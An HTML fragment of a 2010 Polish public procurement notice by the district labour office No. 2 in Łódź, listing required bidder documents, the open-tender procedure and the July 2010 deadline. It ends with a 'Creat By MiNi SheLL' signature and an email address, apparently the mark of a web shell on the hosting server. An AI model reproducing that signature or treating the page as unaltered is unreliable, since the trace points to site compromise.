<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oświadczenie ofertowe - stanowiące załącznik nr 5 do SIWZ, 
2)	część finansową sporządzoną przez wypełnienie formularzy cenowych będących załącznikami nr 6A, 6B oraz 6C do SIWZ,
3)	potwierdzenie że zaoferowany sprzęt będący przedmiotem niniejszego zamówienia spełnia wszystkie warunki techniczne i funkcjonalne wymagane przez Zamawiającego poprzez wypełnienie i podpisanie załączników 7A,7B, 7C do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup2.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy Nr 2 w Łodzi, ul. Kilińskiego 102/102a, 90-012 Łódź, pok. 401.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy Nr 2 w Łodzi, ul. Kilińskiego 102/102a, 90-012 Łódź, kancelaria pok. 006.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com